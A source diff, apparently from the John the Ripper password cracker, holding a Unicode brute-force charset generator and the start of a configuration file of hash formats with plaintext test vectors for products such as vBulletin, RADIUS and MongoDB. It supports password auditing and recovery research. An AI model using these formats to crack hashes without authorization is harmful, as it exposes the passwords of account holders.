+	c = 0x1ee34;		// from ARABIC MATHEMATICAL INITIAL SHEEN
+	while (c <= 0x1ee37)	// ..to ARABIC MATHEMATICAL INITIAL KHAH
+		charset[i++] = c++;
+	charset[i++] = 0x1ee4d;	// ARABIC MATHEMATICAL TAILED NOON
+	charset[i++] = 0x1ee4f;	// ARABIC MATHEMATICAL TAILED AIN
+	charset[i++] = 0x1ee51;	// ARABIC MATHEMATICAL TAILED SAD
+	charset[i++] = 0x1ee52;	// ARABIC MATHEMATICAL TAILED QAF
+	charset[i++] = 0x1ee61;	// ARABIC MATHEMATICAL STRETCHED BEH
+	charset[i++] = 0x1ee62;	// ARABIC MATHEMATICAL STRETCHED JEEM
+	c = 0x1ee67;		// from ARABIC MATHEMATICAL STRETCHED HAH
+	while (c <= 0x1ee6a)	// ..to ARABIC MATHEMATICAL STRETCHED KAF
+		charset[i++] = c++;
+	c = 0x1ee6c;		// from ARABIC MATHEMATICAL STRETCHED MEEM
+	while (c <= 0x1ee72)	// ..to ARABIC MATHEMATICAL STRETCHED QAF
+		charset[i++] = c++;
+	c = 0x1ee74;		// from ARABIC MATHEMATICAL STRETCHED SHEEN
+	while (c <= 0x1ee77)	// ..to ARABIC MATHEMATICAL STRETCHED KHAH
+		charset[i++] = c++;
+	c = 0x1ee79;		// from ARABIC MATHEMATICAL STRETCHED DAD
+	while (c <= 0x1ee7c)	// ..to ARABIC MATHEMATICAL STRETCHED DOTLESS BEH
+		charset[i++] = c++;
+	c = 0x1ee80;		// from ARABIC MATHEMATICAL LOOPED ALEF
+	while (c <= 0x1ee89)	// ..to ARABIC MATHEMATICAL LOOPED YEH
+		charset[i++] = c++;
+	c = 0x1ee8b;		// from ARABIC MATHEMATICAL LOOPED LAM
+	while (c <= 0x1ee9b)	// ..to ARABIC MATHEMATICAL LOOPED GHAIN
+		charset[i++] = c++;
+	charset[i++] = 0x1eea1;	// ARABIC MATHEMATICAL DOUBLE-STRUCK BEH
+	charset[i++] = 0x1eea3;	// ARABIC MATHEMATICAL DOUBLE-STRUCK DAL
+	c = 0x1eea5;		// from ARABIC MATHEMATICAL DOUBLE-STRUCK WAW
+	while (c <= 0x1eea9)	// ..to ARABIC MATHEMATICAL DOUBLE-STRUCK YEH
+		charset[i++] = c++;
+	c = 0x1eeab;		// from ARABIC MATHEMATICAL DOUBLE-STRUCK LAM
+	while (c <= 0x1eebb)	// ..to ARABIC MATHEMATICAL DOUBLE-STRUCK GHAIN
+		charset[i++] = c++;
+	charset[i++] = 0x1eef0;	// ARABIC MATHEMATICAL OPERATOR MEEM WITH HAH WITH TATWEEL
+	charset[i++] = 0x1eef1;	// ARABIC MATHEMATICAL OPERATOR HAH WITH DAL
+// 1F000..1F02F; Mahjong Tiles
+	c = 0x1f000;		// from MAHJONG TILE EAST WIND
+	while (c <= 0x1f02b)	// ..to MAHJONG TILE BACK
+		charset[i++] = c++;
+// 1F030..1F09F; Domino Tiles
+	c = 0x1f030;		// from DOMINO TILE HORIZONTAL BACK
+	while (c <= 0x1f093)	// ..to DOMINO TILE VERTICAL-06-06
+		charset[i++] = c++;
+// 1F0A0..1F0FF; Playing Cards
+	c = 0x1f0a0;		// from PLAYING CARD BACK
+	while (c <= 0x1f0ae)	// ..to PLAYING CARD KING OF SPADES
+		charset[i++] = c++;
+	c = 0x1f0b1;		// from PLAYING CARD ACE OF HEARTS
+	while (c <= 0x1f0bf)	// ..to PLAYING CARD RED JOKER
+		charset[i++] = c++;
+	c = 0x1f0c1;		// from PLAYING CARD ACE OF DIAMONDS
+	while (c <= 0x1f0cf)	// ..to PLAYING CARD BLACK JOKER
+		charset[i++] = c++;
+	c = 0x1f0d1;		// from PLAYING CARD ACE OF CLUBS
+	while (c <= 0x1f0f5)	// ..to PLAYING CARD TRUMP-21
+		charset[i++] = c++;
+// 1F100..1F1FF; Enclosed Alphanumeric Supplement
+	c = 0x1f100;		// from DIGIT ZERO FULL STOP
+	while (c <= 0x1f10c)	// ..to DINGBAT NEGATIVE CIRCLED SANS-SERIF DIGIT ZERO
+		charset[i++] = c++;
+	c = 0x1f110;		// from PARENTHESIZED LATIN CAPITAL LETTER A
+	while (c <= 0x1f16b)	// ..to RAISED MD SIGN
+		charset[i++] = c++;
+	c = 0x1f170;		// from NEGATIVE SQUARED LATIN CAPITAL LETTER A
+	while (c <= 0x1f1ac)	// ..to SQUARED VOD
+		charset[i++] = c++;
+	c = 0x1f1e6;		// from REGIONAL INDICATOR SYMBOL LETTER A
+	while (c <= 0x1f1ff)	// ..to REGIONAL INDICATOR SYMBOL LETTER Z
+		charset[i++] = c++;
+// 1F200..1F2FF; Enclosed Ideographic Supplement
+	charset[i++] = 0x1f200;	// SQUARE HIRAGANA HOKA
+	charset[i++] = 0x1f202;	// SQUARED KATAKANA SA
+	c = 0x1f210;		// from SQUARED CJK UNIFIED IDEOGRAPH-624B
+	while (c <= 0x1f23b)	// ..to SQUARED CJK UNIFIED IDEOGRAPH-914D
+		charset[i++] = c++;
+	c = 0x1f240;		// from TORTOISE SHELL BRACKETED CJK UNIFIED IDEOGRAPH-672C
+	while (c <= 0x1f248)	// ..to TORTOISE SHELL BRACKETED CJK UNIFIED IDEOGRAPH-6557
+		charset[i++] = c++;
+	charset[i++] = 0x1f250;	// CIRCLED IDEOGRAPH ADVANTAGE
+	charset[i++] = 0x1f251;	// CIRCLED IDEOGRAPH ACCEPT
+	c = 0x1f260;		// from ROUNDED SYMBOL FOR FU
+	while (c <= 0x1f265)	// ..to ROUNDED SYMBOL FOR CAI
+		charset[i++] = c++;
+// 1F300..1F5FF; Miscellaneous Symbols and Pictographs
+	c = 0x1f300;		// from CYCLONE
+	while (c <= 0x1f5ff)	// ..to MOYAI
+		charset[i++] = c++;
+// 1F600..1F64F; Emoticons
+	c = 0x1f600;		// from GRINNING FACE
+	while (c <= 0x1f64f)	// ..to PERSON WITH FOLDED HANDS
+		charset[i++] = c++;
+// 1F650..1F67F; Ornamental Dingbats
+	c = 0x1f650;		// from NORTH WEST POINTING LEAF
+	while (c <= 0x1f67f)	// ..to REVERSE CHECKER BOARD
+		charset[i++] = c++;
+// 1F680..1F6FF; Transport and Map Symbols
+	c = 0x1f680;		// from ROCKET
+	while (c <= 0x1f6d4)	// ..to PAGODA
+		charset[i++] = c++;
+	c = 0x1f6e0;		// from HAMMER AND WRENCH
+	while (c <= 0x1f6ec)	// ..to AIRPLANE ARRIVING
+		charset[i++] = c++;
+	c = 0x1f6f0;		// from SATELLITE
+	while (c <= 0x1f6f9)	// ..to SKATEBOARD
+		charset[i++] = c++;
+// 1F700..1F77F; Alchemical Symbols
+	c = 0x1f700;		// from ALCHEMICAL SYMBOL FOR QUINTESSENCE
+	while (c <= 0x1f773)	// ..to ALCHEMICAL SYMBOL FOR HALF OUNCE
+		charset[i++] = c++;
+// 1F780..1F7FF; Geometric Shapes Extended
+	c = 0x1f780;		// from BLACK LEFT-POINTING ISOSCELES RIGHT TRIANGLE
+	while (c <= 0x1f7d8)	// ..to NEGATIVE CIRCLED SQUARE
+		charset[i++] = c++;
+// 1F800..1F8FF; Supplemental Arrows-C
+	c = 0x1f800;		// from LEFTWARDS ARROW WITH SMALL TRIANGLE ARROWHEAD
+	while (c <= 0x1f80b)	// ..to DOWNWARDS ARROW WITH LARGE TRIANGLE ARROWHEAD
+		charset[i++] = c++;
+	c = 0x1f810;		// from LEFTWARDS ARROW WITH SMALL EQUILATERAL ARROWHEAD
+	while (c <= 0x1f847)	// ..to DOWNWARDS HEAVY ARROW
+		charset[i++] = c++;
+	c = 0x1f850;		// from LEFTWARDS SANS-SERIF ARROW
+	while (c <= 0x1f859)	// ..to UP DOWN SANS-SERIF ARROW
+		charset[i++] = c++;
+	c = 0x1f860;		// from WIDE-HEADED LEFTWARDS LIGHT BARB ARROW
+	while (c <= 0x1f887)	// ..to WIDE-HEADED SOUTH WEST VERY HEAVY BARB ARROW
+		charset[i++] = c++;
+	c = 0x1f890;		// from LEFTWARDS TRIANGLE ARROWHEAD
+	while (c <= 0x1f8ad)	// ..to WHITE ARROW SHAFT WIDTH TWO THIRDS
+		charset[i++] = c++;
+// 1F900..1F9FF; Supplemental Symbols and Pictographs
+	c = 0x1f900;		// from CIRCLED CROSS FORMEE WITH FOUR DOTS
+	while (c <= 0x1f90b)	// ..to DOWNWARD FACING NOTCHED HOOK WITH DOT
+		charset[i++] = c++;
+	c = 0x1f910;		// from ZIPPER-MOUTH FACE
+	while (c <= 0x1f93e)	// ..to HANDBALL
+		charset[i++] = c++;
+	c = 0x1f940;		// from WILTED FLOWER
+	while (c <= 0x1f970)	// ..to SMILING FACE WITH SMILING EYES AND THREE HEARTS
+		charset[i++] = c++;
+	c = 0x1f973;		// from FACE WITH PARTY HORN AND PARTY HAT
+	while (c <= 0x1f976)	// ..to FREEZING FACE
+		charset[i++] = c++;
+	c = 0x1f97c;		// from LAB COAT
+	while (c <= 0x1f9a2)	// ..to SWAN
+		charset[i++] = c++;
+	c = 0x1f9b0;		// from EMOJI COMPONENT RED HAIR
+	while (c <= 0x1f9b9)	// ..to SUPERVILLAIN
+		charset[i++] = c++;
+	charset[i++] = 0x1f9c0;	// CHEESE WEDGE
+	charset[i++] = 0x1f9c2;	// SALT SHAKER
+	c = 0x1f9d0;		// from FACE WITH MONOCLE
+	while (c <= 0x1f9ff)	// ..to NAZAR AMULET
+		charset[i++] = c++;
+// 1FA00..1FA6F; Chess Symbols
+	c = 0x1fa60;		// from XIANGQI RED GENERAL
+	while (c <= 0x1fa6d)	// ..to XIANGQI BLACK SOLDIER
+		charset[i++] = c++;
+// 20000..2A6DF; CJK Unified Ideographs Extension B
+	c = 0x20000;		// from <CJK Ideograph Extension B, First>
+	while (c <= 0x2a6d6)	// ..to <CJK Ideograph Extension B, Last>
+		charset[i++] = c++;
+// 2A700..2B73F; CJK Unified Ideographs Extension C
+	c = 0x2a700;		// from <CJK Ideograph Extension C, First>
+	while (c <= 0x2b734)	// ..to <CJK Ideograph Extension C, Last>
+		charset[i++] = c++;
+// 2B740..2B81F; CJK Unified Ideographs Extension D
+	c = 0x2b740;		// from <CJK Ideograph Extension D, First>
+	while (c <= 0x2b81d)	// ..to <CJK Ideograph Extension D, Last>
+		charset[i++] = c++;
+// 2B820..2CEAF; CJK Unified Ideographs Extension E
+	c = 0x2b820;		// from <CJK Ideograph Extension E, First>
+	while (c <= 0x2cea1)	// ..to <CJK Ideograph Extension E, Last>
+		charset[i++] = c++;
+// 2CEB0..2EBEF; CJK Unified Ideographs Extension F
+	c = 0x2ceb0;		// from <CJK Ideograph Extension F, First>
+	while (c <= 0x2ebe0)	// ..to <CJK Ideograph Extension F, Last>
+		charset[i++] = c++;
+// 2F800..2FA1F; CJK Compatibility Ideographs Supplement
+	c = 0x2f800;		// from CJK COMPATIBILITY IDEOGRAPH-2F800
+	while (c <= 0x2fa1d)	// ..to CJK COMPATIBILITY IDEOGRAPH-2FA1D
+		charset[i++] = c++;
+// E0000..E007F; Tags
+	c = 0xe0020;		// from TAG SPACE
+	while (c <= 0xe007f)	// ..to CANCEL TAG
+		charset[i++] = c++;
+// E0100..E01EF; Variation Selectors Supplement
+// F0000..FFFFF; Supplementary Private Use Area-A
+// 100000..10FFFF; Supplementary Private Use Area-B
+
+/* Zero-terminate it, and cache the first character */
+	charset[i] = 0;
+	c0 = charset[0];
+
+	last = minlength - 1;
+	i = 0;
+	while (i <= last) {
+		id[i] = 0;
+		word[i++] = c0;
+	}
+	lastid = -1;
+	word[i] = 0;
+
+/* We must init word with dummy data, it doesn't get set until filter() */
+	word = 1;
+}
+
+void generate()
+{
+	int i;
+
+/* Handle the typical case specially */
+	if (word[last] = charset[++lastid]) return;
+
+	lastid = 0;
+	word[i = last] = c0;
+	while (i--) {			// Have a preceding position?
+		if (word[i] = charset[++id[i]]) return;
+		id[i] = 0;
+		word[i] = c0;
+	}
+
+	if (++last < maxlength) {	// Next length?
+		id[last] = lastid = 0;
+		word[last] = c0;
+		word[last + 1] = 0;
+	} else				// We're done
+		word = 0;
+}
+
+void restore()
+{
+	int i, c;
+
+	/* Calculate the current length and infer the character indices */
+	last = 0;
+	while (c = word[last]) {
+		i = 0; while (charset[i] != c && charset[i]) i++;
+		if (!charset[i]) i = 0;	// Not found
+		id[last++] = i;
+	}
+	lastid = id[--last];
+}
@@ -0,0 +1,1300 @@
+# Here are some examples of DYNAMIC.
+# Please refer to ./doc/DYNAMIC for documentation on how to set these up.
+# Format names up to dynamic_999 are reserved for builtin functions.
+
+####################################################################
+# here is a synopsis of the formats in this file.  Please keep this up to date
+####################################################################
+# dynamic_1001: md5(md5(md5(md5($p))))
+# dynamic_1002: md5(md5(md5(md5(md5($p)))))
+# dynamic_1003: md5(md5($p).md5($p))
+# dynamic_1004: md5(md5(md5(md5(md5(md5($p))))))
+# dynamic_1005: md5(md5(md5(md5(md5(md5(md5($p)))))))
+# dynamic_1006: md5(md5(md5(md5(md5(md5(md5(md5($p))))))))
+# dynamic_1007: md5(md5($p).$s) (vBulletin)
+# dynamic_1008: md5($p.$s) (RADIUS User-Password)
+# dynamic_1009: md5($s.$p) (RADIUS Responses)
+# dynamic_1010: md5($p null_padded_to_len_100) RAdmin v2.x MD5
+# dynamic_1011: md5($p.md5($s)) (webEdition CMS)
+# dynamic_1012: md5($p.md5($s)) (webEdition CMS)
+# dynamic_1013: md5($p.PMD5(username)) (webEdition CMS)
+# dynamic_1014: md5($p.$s) (long salt)
+# dynamic_1015: md5(md5($p.$u).$s) (PostgreSQL 'pass the hash')
+# dynamic_1016: md5($p.$s) (long salt)
+# dynamic_1017: md5($s.$p) (long salt)
+# dynamic_1018: md5(sha1(sha1($p)))
+# dynamic_1019: md5(sha1(sha1(md5($p))))
+# dynamic_1020: md5(sha1(md5($p)))
+# dynamic_1021: md5(sha1(md5(sha1($p))))
+# dynamic_1022: md5(sha1(md5(sha1(md5($p)))))
+# dynamic_1023: sha1($p) (hash truncated to length 32)
+# dynamic_1024: sha1(md5($p)) (hash truncated to length 32)
+# dynamic_1025: sha1(md5(md5($p))) (hash truncated to length 32)
+# dynamic_1026: sha1(sha1($p)) (hash truncated to length 32)
+# dynamic_1027: sha1(sha1(sha1($p))) (hash truncated to length 32)
+# dynamic_1028: sha1(sha1_raw($p)) (hash truncated to length 32)
+# dynamic_1029: sha256($p) (hash truncated to length 32)
+# dynamic_1030: whirlpool($p) (hash truncated to length 32)
+# dynamic_1031: gost($p) (hash truncated to length 32)
+# dynamic_1032: sha1_64(utf16($p)) (PeopleSoft)
+# dynamic_1033: sha1_64(utf16($p).$s)
+# dynamic_1034: md5($p.$u) (PostgreSQL MD5)
+# dynamic_1300: md5(md5_raw($p))
+# dynamic_1350: md5(md5($s.$p):$s)
+# dynamic_1400: sha1(utf16($p)) (Microsoft CREDHIST)
+# dynamic_1401: md5($u.\nskyper\n.$p) (Skype MD5)
+# dynamic_1501: sha1($s.sha1($p)) (Redmine)
+# dynamic_1502: sha1(sha1($p).$s) (XenForo SHA-1)
+# dynamic_1503: sha256(sha256($p).$s) (XenForo SHA-256)
+# dynamic_1504: sha1($s.$p.$s)
+# dynamic_1505: md5($p.$s.md5($p.$s))
+# dynamic_1506: md5($u.:XDB:.$p) (Oracle 12c "H" hash)
+# dynamic_1507: sha1(utf16($const.$p)) (Mcafee master pass)
+# dynamic_1518: md5(sha1($p).md5($p).sha1($p))
+# dynamic_1528: sha256($s.$p.$s) (Telegram for Android)
+# dynamic_1529: sha1($p null_padded_to_len_32) (DeepSound)
+# dynamic_1550: md5($u.:mongo:.$p) (MONGODB-CR system hash)
+# dynamic_1551: md5($s.$u.(md5($u.:mongo:.$p)) (MONGODB-CR network hash)
+# dynamic_1552: md5($s.$u.(md5($u.:mongo:.$p)) (MONGODB-CR network hash)
+# dynamic_1560: md5($s.$p.$s2) (SocialEngine)
+# dynamic_1588: sha256($s.sha1($p)) (ColdFusion 11)
+# dynamic_1590: sha1(utf16be(space_pad_10(uc($s)).$p)) (IBM AS/400 SHA1)
+# dynamic_1592: sha1($s.sha1($s.sha1($p))) (wbb3)
+# dynamic_1600: sha1($s.utf16le($p)) (Oracle PeopleSoft PS_TOKEN)
+# dynamic_1608: sha256(sha256_raw(sha256_raw($p))) (Neo Wallet)
+
+####################################################################
+
+####################################################################
+# Simple DYNAMIC type for md5($p)^^4  (i.e. 4 steps of md5 recursively)
+####################################################################
+[List.Generic:dynamic_1001]
+# expression shown will be the string:   dynamic_1001 md5(md5(md5(md5($p))))
+Expression=md5(md5(md5(md5($p))))
+Flag=MGF_KEYS_INPUT
+Flag=MGF_SET_INP2LEN32
+MaxInputLen=55
+MaxInputLenX86=110
+Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__overwrite_from_last_output_to_input2_as_base16_no_size_fix
+#if !ARCH_LITTLE_ENDIAN  // unfortunatly, we have no #define here, so we always have to call this function, in a script or they will fail on BE boxes :(
+Func=DynamicFunc__set_input2_len_32_cleartop
+#endif
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt_md5_in2_to_out1
+Test=$dynamic_1001$57200e13b490d4ae47d5e19be026b057:test1
+Test=$dynamic_1001$c6cc44f9e7fb7efcde62ba2e627a49c6:thatsworking
+Test=$dynamic_1001$0ae9549604e539a249c1fa9f5e5fb73b:test3
+# TestM= will ONLY load in an MMX or SSE2 build of JtR.
+# TestF= will ONLY load in a non-MMX and nonSSE build (flat oSSL build, or generic)
+TestM=$dynamic_1001$94c59ab02fcd39f3ff9a4e553a4afcb6:1234567890123456789012345678901234567890123456789012345
+TestF=$dynamic_1001$a8b46c02f1680860622df837fa78c3e4:12345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+####################################################################
+# Simple DYNAMIC type for md5($p)^^5  (i.e. 5 steps of md5 recursively)
+####################################################################
+[List.Generic:dynamic_1002]
+# expression shown will be the string:   dynamic_1002 md5(md5(md5(md5(md5($p)))))
+Expression=md5(md5(md5(md5(md5($p)))))
+Flag=MGF_KEYS_INPUT
+Flag=MGF_SET_INP2LEN32
+MaxInputLen=55
+MaxInputLenX86=110
+# here is the optimized 'script' to perform the md5 5 times on itself.
+Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__overwrite_from_last_output_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt_md5_in2_to_out1
+# These are test strings for this format.
+Test=$dynamic_1002$25de8cd0b0cf69c5b5bc19c8ee64adab:test1
+Test=$dynamic_1002$a0b535420ea47849f7c2cc09a3ad0ac3:thatsworking
+Test=$dynamic_1002$4cb029bd5b4ef79f785ca685caf17bf8:test3
+TestM=$dynamic_1002$5a791c6c9de2f488a8155f35900348b0:1234567890123456789012345678901234567890123456789012345
+TestF=$dynamic_1002$b8da59d26b6494df42b8c0f1fba8cd7e:12345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+####################################################################
+# Simple DYNAMIC type for md5(md5($p).md5($p))
+####################################################################
+[List.Generic:dynamic_1003]
+# expression shown will be the string:   dynamic_1003 md5(md5($p).md5($p))
+Expression=md5(md5($p).md5($p))
+# NOTE, this format does NOT work on SSE2.  It requires a md5() of a 64 byte string.
+# SSE (or MMX) is limtited to 54 byte max password, due to 'enhancements'
+# Thus, we need a non-sse2 safe flag.
+##JF Flag=MGF_NOTSSE2Safe
+##JF Flag=MGF_KEYS_INPUT
+##JF Flag=MGF_FULL_CLEAN_REQUIRED
+# here is the optimized 'script' to perform hash 'like' IPB but salt replaced with password.
+##JF Func=DynamicFunc__crypt_md5
+##JF Func=DynamicFunc__clean_input2_kwik
+##JF Func=DynamicFunc__append_from_last_output_to_input2_as_base16
+##JF Func=DynamicFunc__append_from_last_output_to_input2_as_base16
+##JF Func=DynamicFunc__crypt_md5_in2_to_out1
+
+# much more optimal.   From 1118k to 2155k on an SSE2 box.
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_KEYS_BASE16_IN1
+Flag=MGF_POOR_OMP
+MaxInputLen=110
+MaxInputLenX86=110
+Func=DynamicFunc__append_input_from_input
+Func=DynamicFunc__MD5_crypt_input1_to_output1_FINAL
+
+# These are test strings for this format.
+Test=$dynamic_1003$478b10974f15e7295883224fd286ccba:test1
+Test=$dynamic_1003$18a59101e6c6fb38260d542a394ecb22:thatsworking
+Test=$dynamic_1003$630b01b68b6db6fd43a751f8147d1faf:test3
+Test=$dynamic_1003$2dbecd858c29d5602da78204af7dfe1b:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+####################################################################
+# Simple DYNAMIC type for md5($p)^^6  (i.e. 6 steps of md5 recursively)
+####################################################################
+[List.Generic:dynamic_1004]
+# expression shown will be the string:   dynamic_1004 md5(md5(md5(md5(md5(md5($p))))))
+Expression=md5(md5(md5(md5(md5(md5($p))))))
+Flag=MGF_KEYS_INPUT
+Flag=MGF_SET_INP2LEN32
+MaxInputLen=55
+MaxInputLenX86=110
+# here is the optimized 'script' to perform the md5 6 times on itself.
+Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__overwrite_from_last_output_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt_md5_in2_to_out1
+# These are test strings for this format.
+Test=$dynamic_1004$de1b991dd27fb9813e88b957a455dccd:test1
+Test=$dynamic_1004$6a62cd3c4d81139f61fb2553cdef0dc7:thatsworking
+Test=$dynamic_1004$a977990e521c5d1d17c6d65fdf2681b4:test3
+TestM=$dynamic_1004$e475d31b00626080fc01ca4832a33293:1234567890123456789012345678901234567890123456789012345
+TestF=$dynamic_1004$f60eca1ad34608b7c6b1b04379b3fee3:12345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+
+####################################################################
+# Simple DYNAMIC type for md5($p)^^7  (i.e. 7 steps of md5 recursively)
+####################################################################
+[List.Generic:dynamic_1005]
+# expression shown will be the string:   dynamic_1005 md5(md5(md5(md5(md5(md5(md5($p)))))))
+Expression=md5(md5(md5(md5(md5(md5(md5($p)))))))
+Flag=MGF_KEYS_INPUT
+Flag=MGF_SET_INP2LEN32
+MaxInputLen=55
+MaxInputLenX86=110
+# here is the optimized 'script' to perform the md5 7 times on itself.
+Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__overwrite_from_last_output_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt_md5_in2_to_out1
+# These are test strings for this format.
+Test=$dynamic_1005$784c527d0d92873ff9c0773e1c35621d:test1
+Test=$dynamic_1005$efcbbe6331caecf0e7f40160e65aadcc:thatsworking
+Test=$dynamic_1005$abb8bdd2c6ac2dfea2b2af6f5aed5446:test3
+TestM=$dynamic_1005$8f853f8abf74a8e686c213a9849d9beb:1234567890123456789012345678901234567890123456789012345
+TestF=$dynamic_1005$37e4fc15b5dc59286aee85f4b7008315:12345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+####################################################################
+# Simple DYNAMIC type for md5($p)^^8  (i.e. 8 steps of md5 recursively)
+####################################################################
+[List.Generic:dynamic_1006]
+# expression shown will be the string:   dynamic_1006 md5(md5(md5(md5(md5(md5(md5(md5($p))))))))
+Expression=md5(md5(md5(md5(md5(md5(md5(md5($p))))))))
+Flag=MGF_KEYS_INPUT
+Flag=MGF_SET_INP2LEN32
+MaxInputLen=55
+MaxInputLenX86=110
+# here is the optimized 'script' to perform the md5 8 times on itself.
+Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__overwrite_from_last_output_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt_md5_in2_to_out1
+# These are test strings for this format.
+Test=$dynamic_1006$1ec1f32398f64cab51183f63630eceea:test1
+Test=$dynamic_1006$f66b339ac21d6fd6af216f2b70aab2c9:thatsworking
+Test=$dynamic_1006$e9d38522b5eeec753332e576e2e0fe5d:test3
+TestM=$dynamic_1006$399310c857c0d83b931441d514528ee6:1234567890123456789012345678901234567890123456789012345
+TestF=$dynamic_1006$e89d92a2291b5b43b6697c51d722ae8b:12345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+####################################################################
+# Simple DYNAMIC type for vBulletin md5(md5($p).$s)   Included here to 'exercise' the script parser
+####################################################################
+[List.Generic:dynamic_1007]
+# expression shown will be the string:   dynamic_1007 md5(md5($p).$s) [vBulletin]
+Expression=md5(md5($p).$s) (vBulletin)
+# Flag needed here, is Salt.  There is no 'fixed' saltlen.
+Flag=MGF_SALTED
+Flag=MGF_KEYS_BASE16_IN1
+# vBulletin has a 'fixed' 3 byte salt, so list the fixed size  (restriction removed).
+SaltLen=-23
+SaltLenX86=-64
+MaxInputLen=55
+MaxInputLenX86=110
+# here is the optimized 'script' to perform vBulletin hash
+Func=DynamicFunc__set_input_len_32_cleartop
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__crypt_md5
+Test=$dynamic_1007$daa61d77e218e42060c2fa198ac1feaf$SXB:test1
+Test=$dynamic_1007$de56b00bb15d6db79204bd44383469bc$T &:thatsworking
+Test=$dynamic_1007$fb685c6f469f6e549c85e4c1fb5a65a6$HEX$5C483A:test3
+Test=$dynamic_1007$5dd8145e0d1e2499bce05dcb4bce5cdf$HEX$24324F:testme
+TestM=$dynamic_1007$09019afd1303ff078ba323569ac05ea5$123:1234567890123456789012345678901234567890123456789012
+TestF=$dynamic_1007$1eff62d90df7e82566f75f7cfb316f6e$PS9:12345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+####################################################################
+# Dynamic type for algorithm used in RADIUS User-Password attribute md5($p.$s)
+####################################################################
+[List.Generic:dynamic_1008]
+# expression shown will be this string:
+Expression=md5($p.$s) (RADIUS User-Password)
+# Flag needed here, is Salt
+Flag=MGF_SALTED
+# The salt has a fixed length of 16 bytes
+Saltlen=16
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__crypt_md5
+Test=$dynamic_1008$b962b0d40fc9111ce5f8efab424bad73$NormalSaltNormal:secret
+Test=$dynamic_1008$8bfccd9d67ec0bcdc38e9ae3c19a2903$FinishingwitHEX$:secret
+Test=$dynamic_1008$bf239357f3aa95508a53fe41b7e5f2e3$inthem$HEXiddle6:secret
+# unfortunately, these next 2 have embedded NULLs, so at this time they have been removed.
